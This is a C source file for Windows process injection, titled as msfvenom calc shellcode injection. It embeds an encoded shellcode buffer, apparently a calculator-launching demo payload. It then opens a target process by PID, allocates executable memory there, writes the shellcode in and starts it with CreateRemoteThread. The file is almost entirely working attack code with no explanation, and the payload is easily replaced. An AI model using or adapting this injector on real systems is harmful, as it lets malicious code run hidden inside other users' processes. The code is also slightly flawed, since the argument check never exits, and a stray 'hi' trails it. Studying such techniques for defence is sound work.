msfvenom calc shellcode injection
#include <windows.h>
#include <stdio.h>
DWORD PID = NULL, TID = NULL;
HANDLE hProcess = NULL, hThread = NULL;
LPVOID rBuffer = NULL;
int main(int argc, char* argv[])
{
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\xfb\x8c\xb4\xbf\x89\xfa\x89\x36\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x07\xc4\x37"
"\x5b\x79\x12\x49\x36\xfb\x8c\xf5\xee\xc8\xaa\xdb\x67\xad"
"\xc4\x85\x6d\xec\xb2\x02\x64\x9b\xc4\x3f\xed\x91\xb2\x02"
"\x64\xdb\xc4\x3f\xcd\xd9\xb2\x86\x81\xb1\xc6\xf9\x8e\x40"
"\xb2\xb8\xf6\x57\xb0\xd5\xc3\x8b\xd6\xa9\x77\x3a\x45\xb9"
"\xfe\x88\x3b\x6b\xdb\xa9\xcd\xe5\xf7\x02\xa8\xa9\xbd\xb9"
"\xb0\xfc\xbe\x59\x71\x09\xbe\xfb\x8c\xb4\xf7\x0c\x3a\xfd"
"\x51\xb3\x8d\x64\xef\x02\xb2\x91\x72\x70\xcc\x94\xf6\x88"
"\x2a\x6a\x60\xb3\x73\x7d\xfe\x02\xce\x01\x7e\xfa\x5a\xf9"
"\x8e\x40\xb2\xb8\xf6\x57\xcd\x75\x76\x84\xbb\x88\xf7\xc3"
"\x6c\xc1\x4e\xc5\xf9\xc5\x12\xf3\xc9\x8d\x6e\xfc\x22\xd1"
"\x72\x70\xcc\x90\xf6\x88\x2a\xef\x77\x70\x80\xfc\xfb\x02"
"\xba\x95\x7f\xfa\x5c\xf5\x34\x8d\x72\xc1\x37\x2b\xcd\xec"
"\xfe\xd1\xa4\xd0\x6c\xba\xd4\xf5\xe6\xc8\xa0\xc1\xb5\x17"
"\xac\xf5\xed\x76\x1a\xd1\x77\xa2\xd6\xfc\x34\x9b\x13\xde"
"\xc9\x04\x73\xe9\xf7\x33\xfb\x89\x36\xfb\x8c\xb4\xbf\x89"
"\xb2\x04\xbb\xfa\x8d\xb4\xbf\xc8\x40\xb8\xbd\x94\x0b\x4b"
"\x6a\x32\x0a\x3c\x94\xad\xcd\x0e\x19\x1c\x47\x14\xc9\x2e"
"\xc4\x37\x7b\xa1\xc6\x8f\x4a\xf1\x0c\x4f\x5f\xfc\xff\x32"
"\x71\xe8\xfe\xdb\xd5\x89\xa3\xc8\xbf\x21\x73\x61\xdc\xe8"
"\x96\xea\x18\x9e\xf4\xd1\xbf\x89\xfa\x89\x36";
if (argc < 2)
{
printf("usage: %s <PID>", argv[0]);
}
PID = atoi(argv[1]);
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
if (hProcess == NULL)
{
printf("falied to got a handle to the process(%d)", GetLastError());
}
rBuffer = VirtualAllocEx(hProcess, NULL, sizeof(buf), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
if (rBuffer == NULL)
{
printf("failed to allocate buffer(%d)", GetLastError());
}
WriteProcessMemory(hProcess, rBuffer, buf, sizeof(buf), NULL);
printf("wrote shellcode to allocated buffer\n");
hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, &TID);
if (hThread == NULL)
{
printf("failed to get a handle to the new thread(%d)", GetLastError());
}
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
CloseHandle(hProcess);
return 0;
}
hi